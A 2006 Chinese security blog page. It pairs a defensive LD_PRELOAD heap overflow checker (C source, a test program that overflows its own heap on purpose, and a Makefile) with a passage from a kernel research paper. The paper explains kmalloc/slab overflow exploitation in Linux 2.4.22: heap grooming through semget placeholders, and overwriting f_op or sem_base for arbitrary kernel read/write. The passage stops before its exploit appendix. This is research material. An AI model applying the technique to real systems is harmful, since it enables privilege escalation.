2006年12月15日星期五

Linux Heap overflow Checker v0.2.0

一个简单的小工具。这个工具可以在溢出发生时crash进程,这样就可以准确的确定堆溢出点。使用这个功能需要编译时指定编译模式:

MODE=-DGHC_CRASH_MODE

#!/bin/bash
##
# Heap overflow Checker
# Version: 0.2.0
# Written by grip2
##

mkdir heapof_check
cd heapof_check

## README
cat << __EOF__ > README
grip2@debian:~/heapof_check$ ls
Makefile README ghc.c test.c

grip2@debian:~/heapof_check$ make
gcc -shared -o ghc.so -fPIC ghc.c -nostdlib -ldl -Wall
ghc.c:30: warning: integer constant is too large for 'long' type

grip2@debian:~/heapof_check$ export LD_PRELOAD=/home/grip2/heapof_check/ghc.so

grip2@debian:~/heapof_check$ ./test
[** warning **] head overflow at 0x80496d0
[** warning **] tail overflow at 0x80496f0
[** error **] free NULL pointer

grip2@debian:~/heapof_check$ export LD_PRELOAD=
grip2@debian:~/heapof_check$
__EOF__

## ghc.c
cat << __EOF__ > ghc.c
/**
* ghc.c -- Heap overflow Check
* version: 0.2.0
* Written by grip2
*/

#define _GNU_SOURCE /* for RTLD_NEXT */
#include <dlfcn.h>

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#include <asm/page.h> /* for PAGE_SIZE */

enum { /* memory Alloc MODE */
AMODE_MALLOC = 0,
#define AMDOE_MALLOC AMODE_MALLOC
AMODE_SBRK,
#define AMDOE_SBRK AMODE_SBRK
};

#define hc_log(...) do { printf(__VA_ARGS__); printf("\n"); } while (0)

void *malloc(size_t size);
void free(void *ptr);
void *realloc(void *ptr, size_t size);
void *calloc(size_t nmemb, size_t size);

static void __hc_init(void);

typedef void *malloc_t(size_t size);
static malloc_t *pmalloc;
typedef void free_t(void *);
static free_t *pfree;

#ifndef GHC_CRASH_MODE
/*
 * Guard value copied immediately in front of and immediately behind every
 * user chunk by __ghc_alloc(); memcheck() compares both copies against it.
 * The LL suffix gives the constant an explicit long long type, which avoids
 * the "integer constant is too large for 'long' type" warning on 32-bit
 * builds.
 */
typedef long long magic_stamp_t;
static magic_stamp_t magic_stamp = 0x1976112619770116LL;
#endif

static volatile int init_flag = 0; /* for pmalloc, pfree, etc. */
int hc_lock = 0;

#if 0
/*
 * Disabled stub entry point (compiled out by the surrounding "#if 0").
 * It only builds the version banner string and returns 0; the banner is
 * never printed.
 */
int main(void)
{
char *banner = "** ghc.so - Heap overflow Check.\n"
"** Version 0.2.0\n"
"Written by grip2 \n";
return 0;
}
#endif

/*
 * Look up the next "malloc" and "free" definitions in the symbol search
 * order (RTLD_NEXT) and store them in pmalloc / pfree.
 *
 * Any lookup error reported by dlerror() is printed to stderr and the
 * process exits with status -1: running on without the underlying
 * allocator would be worse than stopping.
 */
static void __hc_init(void)
{
    char *msg;

#ifdef GHC_DEBUG
    printf("** Heap overflow Checker init ...\n");
#endif

    /* Clear any pending error so the checks below only see our lookups. */
    dlerror();

    pmalloc = (malloc_t *) dlsym(RTLD_NEXT, "malloc");
    msg = dlerror();
    if (msg != NULL) {
        fprintf(stderr, "in %s line %d: %s\n", __FILE__, __LINE__, msg);
        exit(-1);
    }

    pfree = (free_t *) dlsym(RTLD_NEXT, "free");
    msg = dlerror();
    if (msg != NULL) {
        fprintf(stderr, "in %s line %d: %s\n", __FILE__, __LINE__, msg);
        exit(-1);
    }
}

/*
 * Run __hc_init() exactly once, even when several threads enter the
 * allocator wrappers at the same time.
 *
 * hc_lock is claimed with an atomic test-and-set performed directly on the
 * shared variable. The caller that observes the previous value 0 performs
 * the initialisation and then publishes it by setting init_flag; every
 * other caller busy-waits until init_flag becomes non-zero.
 *
 * NOTE(review): a nested call made by the initialising thread itself
 * (for example if __hc_init() ends up calling malloc) takes the waiting
 * branch and spins; callers are expected to avoid that path.
 */
static void safe_hc_init(void)
{
    /* Atomically store 1 into hc_lock and fetch what was there before. */
    if (__sync_lock_test_and_set(&hc_lock, 1) == 0) {
        __hc_init();
        /* Make the resolved function pointers visible before the flag. */
        __sync_synchronize();
        init_flag = 1;
    } else {
        while (init_flag == 0)
            ;
    }
}

#ifndef GHC_CRASH_MODE
/*
 * Map a user pointer back to the start of its raw block by stepping over
 * the header that precedes it: one magic stamp followed by two int length
 * fields.
 */
static inline void *get_head_from_user(void *ptr)
{
    return (char *) ptr - (sizeof(magic_stamp) + 2*sizeof(int));
}

/*
 * Map the start of a raw block to the user pointer by skipping the header:
 * one magic stamp followed by two int length fields.
 */
static inline void *get_user_from_head(void *pmem)
{
    return (char *) pmem + (sizeof(magic_stamp) + 2*sizeof(int));
}

/*
 * Validate the guard data around one block.
 *
 * pmem points at the raw block start, laid out as
 *     | magic | user length | user length | user space | magic |
 *
 * Checks, in order:
 *   1. the head stamp equals magic_stamp (a mismatch is logged and
 *      remembered, but checking continues);
 *   2. both stored lengths agree and are non-negative (otherwise the tail
 *      cannot be located, so the function gives up immediately);
 *   3. the tail stamp located right behind the user space equals
 *      magic_stamp.
 *
 * Returns 0 when everything is intact, -1 when any check failed.
 */
static int memcheck(void *pmem)
{
    magic_stamp_t head_stamp, tail_stamp;
    int size, size2; /* kept signed so a negative length is detectable */
    int res = 0;
    char *user, *tail;

    /* head stamp */
    memcpy(&head_stamp, pmem, sizeof(head_stamp));
    if (memcmp(&head_stamp, &magic_stamp, sizeof(magic_stamp)) != 0) {
        hc_log("[** warning **]\t head overflow at %p (stamp)", pmem);
        res = -1;
    }

    /* the two redundant length fields */
    size = *(int *) ((char *) pmem + sizeof(head_stamp));
    size2 = *(int *) ((char *) pmem + sizeof(head_stamp) + sizeof(int));
    if (size != size2 || size < 0) {
        hc_log("[** warning **]\t head overflow at %p (user length)",
               (void *) ((char *) pmem + sizeof(head_stamp)));
        return -1;
    }

    /* tail stamp: it sits "size" bytes past the user pointer */
    user = get_user_from_head(pmem);
    tail = user + size;
    memcpy(&tail_stamp, tail, sizeof(tail_stamp));
    if (memcmp(&tail_stamp, &magic_stamp, sizeof(magic_stamp)) != 0) {
        /* report where the damaged stamp really is, not pmem + size */
        hc_log("[** warning **]\t tail overflow at %p", (void *) tail);
        return -1;
    }

    return res;
}
#endif /* ifndef GHC_CRASH_MODE */

/*
 * Return the length that was requested for the chunk behind ptr.
 *
 * Crash mode: the length is read from the int-sized slot that sits in
 * front of the saved start address, directly before the user pointer.
 * Stamp mode: the block is validated with memcheck() first; on failure
 * -1 (converted to size_t) is returned, otherwise the first length field
 * of the header.
 */
static inline size_t get_user_size(void *ptr)
{
#ifdef GHC_CRASH_MODE
    char *len_slot = (char *) ptr - sizeof(unsigned long) - sizeof(unsigned int);

    return *(int *) len_slot;
#else
    void *head = get_head_from_user(ptr);

    if (memcheck(head) != 0)
        return -1;

    return *(int *) ((char *) head + sizeof(magic_stamp));
#endif
}

/*
 * Allocate a user chunk of "size" bytes wrapped in overflow-detection
 * bookkeeping.
 *
 * mode selects the backing allocator: AMODE_MALLOC uses pmalloc (the
 * checker must already be initialised), AMODE_SBRK uses sbrk(). Any other
 * value prints a message and exits with status -1.
 *
 * Crash mode layout:
 *     | stuff1 | user_length | real start_addr | user chunk | memory trap | stuff2 |
 *   The chunk ends exactly where a PROT_NONE page begins, so the first
 *   byte written past it faults.
 * Stamp mode layout:
 *     | magic | user length | user length | user space | magic |
 *
 * Returns the user pointer, or NULL when the backing allocator fails or
 * when the request is too large to be represented: the length is stored
 * and read back as an int, and size + bookkeeping must not wrap size_t.
 */
static void *__ghc_alloc(size_t size, int mode)
{
    void *pmem, *ptr = NULL;
    size_t overhead, realsize;

#ifdef GHC_DEBUG
    printf("** __ghc_alloc -- mode [%d]\n", mode);
#endif

#ifdef GHC_CRASH_MODE
    overhead = sizeof(unsigned int)   /* user_length */
             + sizeof(unsigned long)  /* start_addr */
             + PAGE_SIZE              /* trap */
             + (PAGE_SIZE-1);         /* padding (stuff1 + stuff2) */
#else /* !GHC_CRASH_MODE */
    overhead = 2*sizeof(magic_stamp) + 2*sizeof(int);
#endif

    /*
     * Refuse sizes that do not fit the int length field or that would make
     * size + overhead wrap around; either would yield an undersized block
     * and out-of-bounds bookkeeping writes below.
     */
    if (size > (size_t) (((unsigned int) -1) >> 1)
        || size > (size_t) -1 - overhead)
        return NULL;
    realsize = size + overhead;

    switch (mode) {
    case AMODE_MALLOC:
        assert(init_flag);
        pmem = pmalloc(realsize);
        break;
    case AMODE_SBRK:
        pmem = sbrk(realsize);
        if (pmem == (void *) -1)
            pmem = NULL;
        break;
    default:
        fprintf(stderr, "Unkonwn ALLOC_MODE [%d]\n", mode);
        exit(-1);
    }
#ifdef GHC_DEBUG
    printf(" ** GHC real malloc: %p\n", pmem);
#endif

    if (pmem) {
#ifdef GHC_CRASH_MODE
        char *trap;
        char *user;

        /* last page boundary that still leaves a whole page in the block */
        trap = (char *) ((unsigned long) ((char *) pmem + realsize - PAGE_SIZE)
                         & ~(PAGE_SIZE-1));
        /* the chunk ends exactly at the trap page */
        user = trap - size;
        *(unsigned long *) (user - sizeof(unsigned long)) = (unsigned long) pmem;
        *(unsigned int *) (user - sizeof(unsigned long) - sizeof(unsigned int)) = size;

        if (mprotect(trap, PAGE_SIZE, PROT_NONE)) {
            perror("mprotect");
            exit(-1);
        }
        ptr = user;
#else /* !GHC_CRASH_MODE */
        /* head stamp followed by the length, stored twice */
        memcpy(pmem, &magic_stamp, sizeof(magic_stamp));
        *(int *) ((char *) pmem + sizeof(magic_stamp)) = (int) size;
        *(int *) ((char *) pmem + sizeof(magic_stamp) + sizeof(int)) = (int) size;

        /* user chunk starts right behind the header */
        ptr = get_user_from_head(pmem);

        /* tail stamp right behind the user chunk */
        memcpy((char *) ptr + size, &magic_stamp, sizeof(magic_stamp));
#endif
    }

    return ptr;
}

/*
 * Replacement for malloc(): makes sure the checker is initialised, then
 * hands out a guarded chunk obtained through the AMODE_MALLOC path.
 */
void *malloc(size_t size)
{
#ifdef GHC_DEBUG
    printf("** GHC malloc\n");
#endif
    if (!init_flag)
        safe_hc_init();

    return __ghc_alloc(size, AMODE_MALLOC);
}

/*
 * Release a chunk that was handed out by __ghc_alloc().
 *
 * A NULL pointer is logged and ignored.
 * Crash mode: the trap page behind the chunk is made readable and
 * writable again (exit with status -1 if mprotect fails), then the saved
 * start address stored in front of the user pointer is passed to pfree.
 * Stamp mode: the guards are verified with memcheck(); a damaged block is
 * reported by memcheck() and is NOT passed to pfree.
 */
static void __ghc_free(void *ptr)
{
    void *real;

#ifdef GHC_DEBUG
    printf("** __ghc_free\n");
#endif
    if (ptr == NULL) {
        hc_log("[** warning **]\t free NULL pointer");
        return;
    }

#ifdef GHC_CRASH_MODE
    {
        int user_len = get_user_size(ptr);
        void *guard = (char *) ptr + user_len;

        if (mprotect(guard, PAGE_SIZE, PROT_READ|PROT_WRITE) != 0) {
            perror("mprotect");
            exit(-1);
        }
    }

    real = *(void **) ((char *) ptr - sizeof(unsigned long));
#else
    /* locate the raw block and verify its guards */
    real = get_head_from_user(ptr);
    if (memcheck(real) != 0)
        return;
#endif

#ifdef GHC_DEBUG
    printf(" ** GHC real free: %p\n", real);
#endif
    pfree(real);
}

/*
 * Replacement for free().
 *
 * Once the checker is initialised the request is forwarded to
 * __ghc_free(). Before that nothing is released: if initialisation has
 * not even started (hc_lock is still 0) a panic line is written to stderr
 * (and, in GHC_DEBUG builds, the process exits with status -1); if
 * initialisation is in progress the call is silently ignored.
 */
void free(void *ptr)
{
#ifdef GHC_DEBUG
    printf("** GHC free\n");
#endif
    if (init_flag != 0) {
        __ghc_free(ptr);
        return;
    }

    if (hc_lock == 0) {
        fprintf(stderr, "** PANIC PRELOAD - free **\n");
#ifdef GHC_DEBUG
        exit(-1);
#endif
    }
}

/*
 * Replacement for realloc().
 *
 * - Before the checker is initialised: prints a panic line and returns
 *   NULL.
 * - ptr == NULL behaves like an allocation of "size" bytes.
 * - size == 0 releases ptr and returns NULL.
 * - Otherwise a new guarded chunk is allocated, min(old length, size)
 *   bytes are copied over and the old chunk is released. When the new
 *   allocation fails the old chunk is left untouched and NULL is returned.
 *
 * get_user_size() reports a huge value when it cannot validate the old
 * block, so in that case the copy length falls back to "size".
 */
void *realloc(void *ptr, size_t size)
{
    void *new;
    size_t oldsize, ncopy;

#ifdef GHC_DEBUG
    printf("** GHC realloc\n");
#endif
    if (init_flag == 0) {
        fprintf(stderr, "** PANIC PRELOAD - realloc **\n");
        return NULL;
    }

    if (!ptr) /* see man realloc */
        return __ghc_alloc(size, AMODE_MALLOC);
    if (!size) { /* see man realloc */
        __ghc_free(ptr);
        return NULL;
    }

    new = __ghc_alloc(size, AMODE_MALLOC);
    if (new) {
        oldsize = get_user_size(ptr);
        /* never copy more than either chunk can hold */
        ncopy = (oldsize < size) ? oldsize : size;
        memcpy(new, ptr, ncopy);
        __ghc_free(ptr);
    }

    return new;
}

/*
 * Replacement for calloc(): allocate nmemb * size zero-filled bytes.
 *
 * While initialisation is in progress (hc_lock already taken but
 * init_flag not yet set) the memory comes from sbrk() instead of pmalloc;
 * presumably this serves allocations made by the dynamic loader during
 * the dlsym() lookups - TODO confirm. In every other state the checker is
 * initialised first and the normal path is used.
 *
 * Returns NULL when nmemb * size does not fit in size_t or when the
 * underlying allocation fails.
 */
void *calloc(size_t nmemb, size_t size)
{
    void *p;
    size_t len;
    int mode;

#ifdef GHC_DEBUG
    printf("** GHC calloc\n");
#endif
    mode = (!init_flag && hc_lock)? AMODE_SBRK : AMODE_MALLOC;

    if (mode == AMODE_MALLOC) {
        safe_hc_init();
    }

    /* reject a product that would wrap around and under-allocate */
    if (size != 0 && nmemb > (size_t) -1 / size)
        return NULL;
    len = nmemb*size;

    p = __ghc_alloc(len, mode);
    if (p)
        bzero(p, len); /* see man calloc */

    return p;
}

/* wait a moment ... */
/*
void hc_log(...)
{

}
*/
__EOF__

## test.c
cat << __EOF__ > test.c

#include
#include
#include

/*
 * Demo program for the checker: it corrupts its own heap ON PURPOSE so
 * that a preloaded ghc.so has something to report. Do not "fix" the
 * out-of-bounds writes below.
 */
int main(void)
{
void *p = malloc(16);
void *q = malloc(16);

/* in-bounds clear of the whole 16-byte chunk */
bzero(p, 16);
/* deliberate tail overflow: writes 2 bytes past the end of p */
bzero(p, 18);
#ifndef GHC_CRASH_MODE
/*
 * Deliberate head corruption: overwrites one byte located 9 bytes in
 * front of p. Assuming the ghc.c stamp-mode header (an 8-byte stamp plus
 * two 4-byte lengths), that is the last byte of the head stamp - confirm
 * for the target platform. Compiled out in crash mode.
 */
*(char *) (p - 9) = 2;
#endif

/* q is intact, so this grows it without any report */
q = realloc(q, 32);

free(q);
/* p has damaged guards at this point */
free(p);
/* freeing NULL is reported by the checker */
free(NULL);
return 0;
}
__EOF__

## Makefile
cat << __EOF__ > Makefile
#MODE=-DGHC_CRASH_MODE
CFLAG= -Wall -O2 -DNDEBUG \$(MODE)
#CFLAG= -DGHC_DEBUG -ggdb \$(MODE)
CC=gcc

all: test so
test: test.c
	\$(CC) \$< -o test \$(CFLAG)
so: ghc.c
	\$(CC) -shared -o ghc.so -fPIC \$< -nostdlib -ldl \$(CFLAG)

clean:
	rm -f *.o ghc.so test
__EOF__

Linux内核溢出研究系列(2) - kmalloc溢出技术

Linux内核溢出研究系列(2) - kmalloc溢出技术

作者:grip2
日期:2006-04-12

内容:
1 -- 介绍
2 -- kmalloc/slab简介
3 -- kmalloc/slab的关键特性
4 -- kmalloc exploit
5 -- 更进一步
6 -- 最后
7 -- 参考资料
8 -- 附录 (kexp-msfilter.c)

一、** 介绍

关注isec很长时间了,一直对他们在Linux内核方面的技术研究成果很佩服,同时自己也一直
在跟踪和分析这方面的技术,但是由于时间及精力所限一直没能更深入一步进行系统的研究和总
结。这一段恰好有些时间,和airsupply一起在内核溢出方面进行了一些研究,也写出了几个
isec公布的漏洞的利用代码。为了能对我们的阶段性的工作有所归纳和总结,我们开始着手去写
《linux内核溢出研究》系列的paper。写这个文档的一个目的也是为了与国内对这方面有兴趣的
朋友共享我们的经验,促进我们在内核安全方面的研究和交流。

阅读这篇文档需要你具有一些Linux内核方面的知识,同时要能读懂一点C和汇编代码。文章里
提到的技术和代码是基于x86架构的Linux kernel-2.4.22的,在其它的系统环境中也许有所不同。

二、** kmalloc/slab简介

这部分只是非常简单的介绍一下kmalloc,如果你知道kmalloc和slab是什么,那跳过这部分。
对于kmalloc exploit有用的特性,我们在这里并未描述。

slab是一种缓冲区分配和管理的方法,Linux内核也采用了这种方法,并进行了改进。Linux内核
使用slab机制进行管理的缓冲区(caches)有两种,一种是专用缓冲区,另一种是通用缓冲区。通用缓
冲区的分配是通过调用kmalloc函数来完成的,在内核里被广泛使用,在这里我们只关注它。

我们来看kmalloc函数代码:

void * kmalloc (size_t size, int flags)
{
cache_sizes_t *csizep = cache_sizes; <--- A

for (; csizep->cs_size; csizep++) {
if (size > csizep->cs_size)
continue;
return __kmem_cache_alloc(flags & GFP_DMA ? <--- B
csizep->cs_dmacachep : csizep->cs_cachep, flags);
}
return NULL;
}

A处指向的cache_sizes是一个用来描述通用缓冲池的数据结构,其中根据不同的缓冲区的大小分成
若干队列。它是一个cache_sizes_t类型的数组,数组中的每一个元素描述一个特定尺寸对象的缓冲区,
对于每个尺寸的对象分别对应两个slab队列,一个是用于DMA用途分配,另一个则用于非DMA用途分配。
下面是cache_sizes的定义:

/* Size description struct for general caches. */
typedef struct cache_sizes {
size_t cs_size;
kmem_cache_t *cs_cachep;
kmem_cache_t *cs_dmacachep;
} cache_sizes_t;

static cache_sizes_t cache_sizes[] = {
#if PAGE_SIZE == 4096
{ 32, NULL, NULL},
#endif
{ 64, NULL, NULL},
{ 128, NULL, NULL},
{ 256, NULL, NULL},
{ 512, NULL, NULL},
{ 1024, NULL, NULL},
{ 2048, NULL, NULL},
{ 4096, NULL, NULL},
{ 8192, NULL, NULL},
{ 16384, NULL, NULL},
{ 32768, NULL, NULL},
{ 65536, NULL, NULL},
{131072, NULL, NULL},
{ 0, NULL, NULL}
};

kmalloc通过一个for循环语句来遍历这个数组中的元素,直到找到一个能够满足调用者指定的size大小的
缓冲区描述,然后在B处根据调用者传入的标志来选择DMA或非DMA slab队列,再调用__kmem_cache_alloc
在该队列中分配一个缓冲区并返回给调用者。

三、** kmalloc/slab的关键特性

为了能够利用kmalloc溢出漏洞,我们需要了解kmalloc的三个关键特性(由于kmalloc是基于slab算法的,
因此kmalloc的特性几乎完全由slab算法的实现决定8-)

1、kmalloc/slab是基于伙伴算法的,一个slab块包含多个slab对象,它们是相邻的

slab管理的对象的缓冲区队列是由一连串的slab块组成,而每个slab块内包含若干同种对象。换句话说,
每个slab块内包含多个同种slab对象,对于kmalloc来说,就是在同一个slab块内存放了多个同样大小的
slab对象,即在一个slab块内kmalloc可以分配的内存块是相邻的。

这一点可以通过slab分配代码看出来。当现有slab队列中没有空闲的slab对象时,kmem_cache_grow函数将
被调用。kmem_cache_grow将会进一步调用kmem_getpages为slab缓冲区分配新的内存,

...
/* Get mem for the objs. */
if (!(objp = kmem_getpages(cachep, flags)))
...

而在kmem_getpages函数里最终调用了__get_free_pages(即system's page allocator,它使用了伙伴算法),
同时传入了cachep->gfporder指定分配的页面数量,注意gfporder是每个slab块占用的页面数,

static inline void * kmem_getpages (kmem_cache_t *cachep, unsigned long flags)
{
...
flags |= cachep->gfpflags;
addr = (void*) __get_free_pages(flags, cachep->gfporder);
...
return addr;
}

2、kmalloc/slab的分配和释放使用的是LIFO队列

这一点从代码很容易看出:

kmalloc -> __kmem_cache_alloc -> kmem_cache_alloc_one -> kmem_cache_alloc_one_tail
...
slabp->inuse++;
objp = slabp->s_mem + slabp->free*cachep->objsize;
slabp->free=slab_bufctl(slabp)[slabp->free];
...

kfree -> __kmem_cache_free -> kmem_cache_free_one
...
{
unsigned int objnr = (objp-slabp->s_mem)/cachep->objsize;

slab_bufctl(slabp)[objnr] = slabp->free;
slabp->free = objnr;
}
...

3、kmalloc/slab分配的内存释放的时候,内容并没有被清除

四、** kmalloc exploit

我们来看一个例子:

-------------------------------------
| | |
... | slab对象A | slab对象B | ...
| | |
-------------------------------------

假设上面是一个64字节通用缓冲区中的一个slab块,块中有多个slab对象,内核中有如下代码片段
...
char *buf = kmalloc(64);
copy_from_user(buf, parm, 80);
...

当kmalloc时,slab对象A被分配给buf,当执行copy_from_user后,buf将被溢出。在slab块中,与对
象A相邻的对象B将被溢出16个字节,如果此时对象B恰好被分配用于存放一个重要的数据结构,那么我
们就有可能通过更改这个数据结构中的某个重要的变量值提升权限(通常某个函数指针是一个好的选择)!

是不是看起来很容易?但是要注意了,要成功的利用上面这个例子的漏洞,我们还有几个问题需要解决:

?如何才能使被溢出的slab对象和我们想要覆盖的目标数据结构所在的slab对象是相邻的?

要做到这点,我们必需保证连续的两次对同一大小slab的申请能够得到相邻的两个slab对象。事实上,
在真实的系统环境中这一点是很难保证的,因为在系统使用过程中,内核会经常的使用kmalloc分配
内存,使用完成后又使用kfree释放,这样就使得slab算法维护的可分配slab对象表(partially and free slabs list)
中slab对象之间是没有任何位置关系的,也就是说这时我们连续两次申请得到的内存块,不但不能保
证它们是相邻的,甚至不能保证它们位于同一个slab块内,这样我们的溢出将是完全不可控的。

为了解决这个问题,在UNF的paper中提到了一个“经验”方法。这个方法就是:在他们的测试环境中,
在将现有的slab消耗(不断的分配)到只剩下最后四个未被分配的slab对象时,对这最后四个slab对象
的申请所得到的内存块地址将是连续的。

在我的实际测试中,这个方法确实有一定的成功率,但是这个方法过于“经验”,对系统环境的依赖性
很强,在实际环境中有时非常容易失败,进而导致系统崩溃。

不过我们想到了一个改进的更好的方法。我们首先耗尽我们的溢出所关注的slab缓冲区中现有的所有slab
对象,这时再有对这个slab缓冲区的分配请求的话,系统将创建一块新的slab块,然后从这个新的slab
块中分配一个slab对象返回给申请者。我们来看看系统对新slab块中的slab对象是如何初始化的,

static inline void kmem_cache_init_objs (kmem_cache_t * cachep,
slab_t * slabp, unsigned long ctor_flags)
{
...
for (i = 0; i < cachep->num; i++) {
void* objp = slabp->s_mem+cachep->objsize*i;
...
slab_bufctl(slabp)[i] = i+1;
}
slab_bufctl(slabp)[i-1] = BUFCTL_END;
slabp->free = 0;
}

可以看到在for循环内,新的slab块将按照cachep->objsize将内存分成若干块,每块就是一个slab对象。
对每一个新的slab对象都有一个slab_bufctl(slabp)[i] = i+1处理。这个语句的作用是把当前对象的
下一个free对象设置为当前slab块内地址与其相邻的下一个对象。最后初始化函数将slab块的第一个free
对象设置为0,即块中的第一个对象。到这里就不难看出,对于新分配的slab块,块内的free-slab表(实际
上可以看做是一个LIFO队列)中的对象在内存上都是顺序的,这样我们再申请的slab分配得到的slab对象
就都是相邻的。

?如何才能保证kmalloc溢出时目标数据结构已经在相邻的slab对象中了呢?

虽然在处理上面的问题时,我们已经可以得到相邻的两个slab对象了,但是往往在第一个被溢出的slab
分配后,在返回到应用程序之前溢出就已经发生了(看前面的例子),而这时我们的第二个slab对象还没
被申请,我们要覆盖的数据结构还没在内存中,这样我们的溢出就无法利用了。

这时我们前面介绍的kmalloc的第二个特性就有用了。由于slab对内存的分配释放是使用LIFO队列,所以
我们可以这样做:首先触发一个kmalloc去分配与溢出目标尺寸相同的slab对象作为placeholder(占位),
然后再去触发目标数据结构所需的内存的kmalloc,这时slab块中的情景如下:

------------------------------------------
| | |
... | placeholder | obj-struct | ...
| | |
------------------------------------------

然后我们释放掉placeholder,然后再触发将被溢出的slab对象的分配,由于slab对象的分配释放使用的是
一个后入先出队列,所以将被溢出的slab对象就是刚被释放的placeholder。在溢出发生前,内存的情景如下:

------------------------------------------
| | |
... | overflow-obj | obj-struct | ...
| | |
------------------------------------------

通过这个办法,就保证kmalloc溢出时目标数据结构已经在相邻的slab对象中了,这样我们就可以覆盖我们
指定的数据结构。

?我们如何在应用层做到上面提到的slab对象消耗和分配placeholder呢?

有多个系统调用可以完成这个任务,几个用于IPC的系统调用都可以,但是UNF的paper中提到的sys_semget
比较好,因为它分配的slab对象的尺寸是可控的。每次我们调用sys_semget创建信号量,内核都会使用
kmalloc分配一块内存存放相关数据结构,而且这个数据结构一直存在,直到我们调用删除操作。

sys_semget -> newary
...
size = sizeof (*sma) + nsems * sizeof (struct sem);
sma = (struct sem_array *) ipc_alloc(size);
...

注意上面计算size的代码中的nsems是系统调用的参数,在应用层可以指定。这样我们就可以在任意尺寸的
通用缓冲区中来完成slab对象的消耗和占位。

?我们如何知道什么时候slab被耗尽了呢?从哪里可以看出系统当前还有多少active的slab对象呢?

通过/proc/slabinfo可以得到系统kmalloc的slab信息

grip2@debian:~$ cat /proc/slabinfo
slabinfo - version: 1.1
...
size-131072(DMA) 0 0 131072 0 0 32
size-131072 0 0 131072 0 0 32
size-65536(DMA) 0 0 65536 0 0 16
size-65536 0 0 65536 0 0 16
size-32768(DMA) 0 0 32768 0 0 8
size-32768 0 0 32768 0 0 8
size-16384(DMA) 1 1 16384 1 1 4
size-16384 0 1 16384 0 1 4
size-8192(DMA) 0 0 8192 0 0 2
size-8192 14 14 8192 14 14 2
size-4096(DMA) 0 0 4096 0 0 1
size-4096 30 32 4096 30 32 1
size-2048(DMA) 0 0 2048 0 0 1
size-2048 41 44 2048 22 22 1
size-1024(DMA) 0 0 1024 0 0 1
size-1024 30 36 1024 8 9 1
size-512(DMA) 0 0 512 0 0 1
size-512 74 80 512 10 10 1
size-256(DMA) 0 0 256 0 0 1
size-256 15 30 256 2 2 1
size-128(DMA) 2 30 128 1 1 1
size-128 478 510 128 16 17 1
size-64(DMA) 0 0 64 0 0 1
size-64 87 118 64 2 2 1
size-32(DMA) 2 113 32 1 1 1
size-32 270 339 32 3 3 1

下面是man page里对slabinfo每列数据所代表含义的描述:

For each slab cache, the cache name, the number of currently active objects,
the total number of available objects, the size of each object in bytes,
the number of pages with at least one active object, the total number of allocated pages,
and the number of pages per slab are given.

遗憾的是,在SMP系统环境下,/proc/slabinfo内的信息并不总是能立即反馈系统内真实的slab使用信息,但是
没关系,对于这个问题我们想到了其它办法解决,在文章的后续部分我们将会提及。

?我们应该覆盖什么样的数据结构才能提升权限呢?

通常这个数据结构最好包含一个函数指针,而且应用层应该有机会通过这个指针来调用函数,还有一点就是
这个数据结构的分配应该可以在用户层控制,并且它是通过kmalloc被调用的。满足这个条件的数据结构相信
你在内核可以找到很多,例如struct file结构,

struct file {
struct list_head f_list;
struct dentry *f_dentry;
struct vfsmount *f_vfsmnt;
struct file_operations *f_op;
atomic_t f_count;
unsigned int f_flags;
mode_t f_mode;
loff_t f_pos;
unsigned long f_reada, f_ramax, f_raend, f_ralen, f_rawin;
struct fown_struct f_owner;
unsigned int f_uid, f_gid;
int f_error;

unsigned long f_version;

/* needed for tty driver, and maybe others */
void *private_data;

/* preallocated helper kiobuf to speedup O_DIRECT */
struct kiobuf *f_iobuf;
long f_iobuf_lock;
};

struct file结构中的f_op指针为file_operations结构类型,这个结构中定义了对文件进行各种操作时所
对应的回调处理函数:

struct file_operations {
...
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char *, size_t, loff_t *);
int (*readdir) (struct file *, void *, filldir_t);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
int (*ioctl) (struct inode *, struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
...
};

除了函数指针以外,还有其它信息也可以用于提升权限,比如上个问题中用于消耗slab的sys_semget所使用
的数据结构,

struct sem_array {
struct kern_ipc_perm sem_perm; /* permissions .. see ipc.h */
time_t sem_otime; /* last semop time */
time_t sem_ctime; /* last change time */
struct sem *sem_base; /* ptr to first semaphore in array */
struct sem_queue *sem_pending; /* pending operations to be processed */
struct sem_queue **sem_pending_last; /* last pending operation */
struct sem_undo *undo; /* undo requests on this array */
unsigned long sem_nsems; /* no. of semaphores in array */
};

通过覆盖结构中的sem_base成员,就可以对任意内核地址进行读写,见相应内核代码:

sys_semctl -> semctl_main
...
sma = sem_lock(semid);
...
curr = &sma->sem_base[semnum];
...
switch (cmd) {
case GETVAL:
err = curr->semval;
goto out_unlock;
...
case SETVAL:
{
int val = arg.val;
struct sem_undo *un;
err = -ERANGE;
if (val > SEMVMX || val < 0)
goto out_unlock;

for (un = sma->undo; un; un = un->id_next)
un->semadj[semnum] = 0;
curr->semval = val;
curr->sempid = current->pid;
sma->sem_ctime = CURRENT_TIME;
/* maybe some queued-up processes were waiting for this */
update_queue(sma);
err = 0;
goto out_unlock;
}
...

你可以写current、写sys_call_table 等等...

好了,现在回顾前面的例子,你认为还有什么问题没有解决吗?
我们现在是不是就可以完成kmalloc exploit了呢 8-) ... enjoy

五、** 更进一步

看懂一个技术理论容易,但实现却通常不容易,在我写EXP的时候发现,实现我认为已经很明白的东西要比想象
的麻烦很多,会遭遇到很多没有想到的困难。下面是我们在写实际的kmalloc溢出利用程序时遇到的一些问题和
想到的一些新的技术、方法。这些方法有的实现了有的还未测试,在这里简单的罗列一下,如果有兴趣可以一起
探讨,这也是我们下一步充实和研究kmalloc溢出利用技术的方向。

1. /proc/slabinfo

通过读取slabinfo,我们可以得到足够的用于溢出的信息。但是遗憾的是,在我们的测试中发现,在SMP系统下
cat /proc/slabinfo显示的信息并不能与系统的真实情况同步。虽然air发现有些情况这个信息更新的很及时,
但是到现在为止,我们还不能确认规律,这个也有待进一步试验。

2. 另一个得到相邻slab对象的方法(不依赖于/proc/slabinfo)

由于SMP环境下slabinfo存在的问题,消耗完现有系统slab对象以保证得到相邻slab对象的方法也就不再可行,
因为slabinfo信息不准确,我们无法准确得知目前系统有多少个slab对象需要我们预先消耗。不过,即使没有
